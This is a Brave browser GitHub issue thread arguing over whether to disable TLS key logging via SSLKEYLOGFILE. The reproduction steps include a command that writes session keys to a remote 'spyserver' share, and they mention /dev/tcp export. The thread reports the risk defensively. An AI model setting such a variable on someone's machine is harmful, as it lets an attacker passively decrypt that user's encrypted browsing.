### ISSUE TITLE
Disable BoringSSL TLS Key Logging SSLKEYLOGFILE

### ISSUE THREAD

**Issue by plaintextcity** [brave/brave-browser#3479]
## Description 
Google Chrome, using BoringSSL, includes the capability to log TLS Key material to a local or remote text file.  This could be used to compromise TLS encryption, for example if a machine is tampered with such that the keys are written to a remote file.  

## Steps to Reproduce
   1. Set an environment variable
          setx SSLKEYLOGFILE c:\temp\tlskey.txt /m
          or
          setx SSLKEYLOGFILE \\spyserver\spyshare\tlskey.txt /m
          or 
          (on linux/mac can be exported to /dev/tcp/...)
   2. Launch the browser (chromium, chrome, brave, firefox)
   3. Check contents of tlskey.txt as you browse
         tail c:\temp\tlskey.txt
         or in powershell:
         get-content c:\temp\tlskey.txt -wait

## Actual result:
TLS Keys are logged, even when using Tor Tab.

## Expected result:
TLS Keys should not be logged,

## Reproduces how often: 
Easy to reproduce, this is a feature inherited from Chromium.

## Brave version (brave://version info)
Verified on latest production build 0.60.45 Chromium 72.0.3636.109

### Reproducible on current release:
Have not tested on beta / dev releases but see no mention in issue tracker.

### Website problems only:  
- Does the issue resolve itself when disabling Brave Shields? 
No
- Is the issue reproducible on the latest version of Chrome? 
Yes, the Chrome developers see keylogging as a feature.

### Additional Information
The code for SSLKEYLOGFILE logging is in boringssl.  I would suggest a patch to disable this functionality.

    third_party\boringssl\src\ssl\internal.h:1791:// SSLKEYLOGFILE functions.
    third_party\boringssl\src\tool\client.cc:355:  const char *keylog_file = getenv("SSLKEYLOGFILE");
    third_party\boringssl\src\tool\server.cc:220:  const char *keylog_file = getenv("SSLKEYLOGFILE");

Historical Note: when originally introduced, SSLKEYLOGFILE was only enabled in development versions of Firefox, but soon was enabled in all versions.  When Chrome used NSS it inherited the feature.  When Chome moved to BoringSSL, the feature was added, and it is now also available in OpenSSL 1.1.1, curl, etc.  The Tor Browser project disables TLS Key logging from Firefox.

**Comment by srirambv** [comment]
cc: @diracdeltas @tomlowenthal @jumde

**Comment by diracdeltas** [comment]
I've used this functionality for inspecting decrypted TLS network traffic in wireshark, and I find it quite useful. It involves setting a custom environment variable so would be unlikely for people who don't know what it does to do it by accident.

If a machine is tampered with (ex: by malware), there are ways to decrypt TLS traffic even if we patched out this Chromium feature. An attacker could add a custom root cert or read the master key from memory.

Maybe this feature should require higher privileges but IMO it should be preserved for developers.

**Comment by plaintextcity** [comment]
This is useful functionality for debugging, although intercepting proxies are more effective at troubleshooting web apps, and for real problems you might have to go upstream to Chromium anyhow.  The question is whether it should be enabled by default on a security conscious (/paranoid) browser build.  Chromium and Firefox have debated and the developers have prevailed to keep it enabled, Tor has decided to disable it.

The comparison with a root (+proxy interception) is apt, as an attack that required elevated privileges and active MiTM, while key logging can be set as a user and allows passive decryption, with no way in the browser UI for the user to know her traffic is compromised (i.e., inspect certificate, etc).  It is valid to eliminate a lower cost attack, as in this case, even though higher cost attacks exist.

**Comment by diracdeltas** [comment]
@plaintextcity are there any chromium issues on this? would be curious to see their reasoning.

I'm not sure what you mean by "enabled by default" since this already requires a custom env variable set in order to be enabled. If we "disabled by default," how would developers turn it on?

**Comment by plaintextcity** [comment]
There are a bunch of bugs on SSLKEYLOGFILE, note that the first bug:

Adam Langly blogged about it in 2012, noting that it was a dev channel feature
https://www.imperialviolet.org/2012/06/25/wireshark.html

https://bugs.chromium.org/p/chromium/issues/detail?id=214676
"* Blacklist the existence of /root/.enable_sslkeylogfile in the release signer tests **for safety**"

At some point though, the safety was thrown out the window in favor of being able to debug anywhere.  As you note, in order to debug you have to turn it on (set an environment variable)
